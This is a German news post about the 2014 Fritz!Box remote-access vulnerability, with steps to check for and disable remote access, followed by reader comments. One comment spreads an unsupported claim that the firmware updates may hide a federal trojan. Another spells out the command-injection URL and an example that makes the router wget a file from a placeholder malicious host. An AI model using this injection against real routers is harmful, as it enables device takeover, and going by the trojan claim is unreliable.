Fritz!Box-Hack: Angreifer nutzen nun doch Schwachstelle aus

Wie eine Analyse der Telefonie-Missbräuche über Fritzboxen ergab, haben die Angreifer scheinbar doch eine Schwachstelle in der Fernkonfiguration ausgenutzt, und die zum Login notwendige Authentifizierung beim Fernzugriff per Browser umgangen. Als Reaktion darauf, wird AVM in den nächsten Tagen Firmware-Updates für alle aktuellen Fritzboxen bereitstellen und die Verfügbarkeit auf seinen Sicherheitsseiten ankündigen.

Endkunden, die eine vom Provider bereitgestellte Fritzbox verwenden, bespielsweise Kabel Deutschland oder den Homeserver von 1&1, muss mit dem Reaktivieren des Fernzugangs warten, bis der Provider ein Update bereitstellt.

Bis dahin rät das Unternehmen allen Fritz!Box-Nutzern den Fernzugang abzuschalten und darüberhinaus das Konfigurationspasswort und sämtliche in der Box hinterlegte Zugangsdaten zu ändern. Auch externer SIP-Zugänge!

Und so stellen Sie fest, ob in Ihrer Fritz!Box der Fernzugriff aktiviert ist:

  1. Besuchen Sie den Port-Check:PortCheck
  2. Bitte haben Sie ein paar Sekunden Geduld. Neben der hier beschriebenen “Fernwartung” prüft der Port-Check noch auf weitere Sicherheitslücken und zeigen Ihnen diese bei Auffinden an. Sollte das Ergebnis mit “Scan durchgeführt! Es sind keine kritischen Ports offen” beantwortet werden, wurden keine bekannten Sicherheitslücken gefunden.
  3. Betroffen sind Sie, wenn der Router-Check, wie im nachfolgenden ScreenShot zu sehen ist, folgende Antwort gibt: “Webserver: Stellen Sie über diesen Internetanschluss Webinhalte zur Verfügung? Sollte dies unbewusst geschehen, prüfen Sie bitte inwieweit das Administrations-Frontend Ihres Routers von außen aufrufbar ist, und dieses gegen unberechtigte Zugriffe geschützt ist. Wir empfehlen die Abschaltung des Fernzugriffes; näheres entnehmen Sie hierzu bitte der Anleitung Ihres Heimrouters.

FritzBox

Und so deaktivieren Sie die Fernwartungsfunktion in Ihrer Fritzbox:

  1. Geben Sie in die Adresszeile Ihres Browsers http://fritz.box ein
  2. Falls noch nicht geschehen: vergeben Sie ein ausreichend sicheres Passwort. Klicken Sie hierzu auf “System” und in dem sich öffnenden Untermenü auf “Fritz!Box-Kennwort”.
  3. Um in die Einstellungen für die “Fernwartung” zu gelangen, klicken Sie auf “Internet”, dann auf “Freigaben” und dann auf “Fritz!Box-Dienste”.
  4. Durch Entfernen der Häkchen bei “Internetzugriff auf die FRITZ!Box über HTTPS aktiviert” und “Internetzugriff auf Ihre Speichermedien über FTP/FTPS aktiviert” deaktivieren Sie den Zugriff:Internetfreigaben11
  5. Wenn Sie unbedingt Zugriff auf Ihre FritzBox über das Internet brauchen, so sollten Sie darüber nachdenken, einen VPN-Zugang einzurichten und über diesen auf Ihre FritzBox zuzugreifen. Eine Anleitung dazu finden Sie auf der Webseite von AVM.

3 thoughts on “Fritz!Box-Hack: Angreifer nutzen nun doch Schwachstelle aus”

  1. “Unsere Geräte haben keine Backdoor – so wie die Müllhaufen der Konkurrenz. Weil wir sind viel besser und so.”

    Originaltext vom 03. Januar 2014:
    “In den Medien wird aktuell über eine Router-Sicherheitslücke berichtet, bei der Passwörter im Klartext und die Konfiguration ausgelesen werden können. Kein Modell der FRITZ!Box-Familie ist von der beschriebenen Sicherheitslücke betroffen.”
    http://www.avm.de/de/News/artikel/2014/fritzbox_sicher.html?linkident=kurznotiert

    Nett, dass AVM dass nach dieses Vorfällen dann kurzerhand doch gelöscht hat. Aber das Internet vergisst bekanntlich ja nicht. ^^
    http://web.archive.org/web/20140122081328/http://www.avm.de/de/News/artikel/2014/fritzbox_sicher.html?linkident=kurznotiert

    Es ist eine bodenlose Frechheit, was AVM da vom Stapel gelassen hat. Hinzu kommt noch, dass nicht nur ihre Fernwartung unzureichend gesichert war – sie muss nicht einmal aktiv sein, um sich Zugriff auf die FRITZ!Box zu verschaffen!

    Und hierbei ist nicht einmal vom TR-069 Protokoll die Rede, wo die Zugangsdaten übrigens im Klartext in der Box gespeichert sind… (Zertifikat, Authentifikationsurl, Zugangsdaten Base64 kodiert).

    Wer ‘ne FRITZ!Box nutzt, lebt gefährlich – das Ding ist offen wie einen Scheunentor. Dazu kommt, dass die Hardware so unglaublich schwachbrüstig ist.
    1 million Funktionen soll eine aktuelle Box leisten können – aber alleine am VPN Modus sieht man, wieviel “power” tatsächlich verfügbar ist. 512 KiB/s via VPN, mehr schafft die Hardware eine Fritze nicht, ganz gleich ob man mit Lagerfeuer verbunden ist, oder Glasfaser XXL 4 000.

    Und wer ganz böse ist, mag sich selber was zusammenreimen…

    BND entwickelt Bundestrojaner.
    Bundestrojaner floppt. Schwierigkeit mit der Verbreitung. Muss neu entwickelt werden.
    Langes Schweigen.
    Oh, Wunder… zum 1 000 ten Male wurden Zugangsdaten mit Mailadresse geklaut. Na sowas aber auch – aber diesmal gab’s zwei Tage später immerhin die Warnung vom BSI.
    Und bitte DIESES Mal ganz dringend alle Firmwares aller Router aktualisieren. Ganz dringend (komisch, war sonst nie so dringend…).
    Selbstlos wird ein Test angeboten. Mailadresse und Kennwort. Ist Dein Account betroffen. Präsentiert auf Servern der Deutschen Telekom AG. Servern gemietet bei Strato. Oh, hui! Genau DAS waren die Server, die zuerst durch die BOT Netze infiltriert wurden.
    Na sowas aber auch!

    Und jetzt gibt’s regelmässig Erinnerungen: “Es hat noch nicht jeder die supertollen neuen Firmwareupdates.”

    Wäre ich böse, würde ich denken, da versucht uns wer den Bundestrojaner unterzujubeln. Wer sucht (und findet) den schon in einer Routerfirmware. Vielleicht auch nur ein Hintertürchen für den Bundestrojaner, damit er bald installiert werden kann – Hintertüren und Sicherheitslücken gibt es ja zur Genüge, wenn man nicht gerade zwischen LAN und Router einen PROXY / NAT / FIREWALL in diversen VMs betreibt.

    Und kein Schwein merkt was… das ist noch das Traurigste an der ganzen Geschichte. Aber fleissig Panik verbreiten, ohne nachzudenken, was hier tatsächlich geschehen ist.

    Deutschland schafft sich nicht ab – Deutschland HAT sich abgeschafft. Das Volk der Dichter und Denker ist tot, es lebe die Unterschicht-TV / MMO-WoW Generation.

  2. hallo,

    die Sicherheitslücke ist viel gravierender und schlimmer als es berichtet wird.
    Es hat nichts mit der Fernwartung zu tun.

    Funktionsweise :
    http://192.168.178.1/cgi-bin/webcm?var:lang=%26{hier kommt einen beliebigen Befehl rein}

    Eine Internetseite kann also beliebige Befehle auf dem Fritzbox ausführen,durch aufruf dieses URLs.

    Zum Beispiel :
    http://192.168.178.1/cgi-bin/webcm?var:lang=%26wget http://boeseseite/wasboeses

    würde dazu führen,dass Fritzbox die böse seite aufruft.Alternativ kann man Einwahlregeln runterschieben.

    Wie gesagt beliebige Befehle auf dem Fritzbox ausführen

Kommentare sind geschlossen.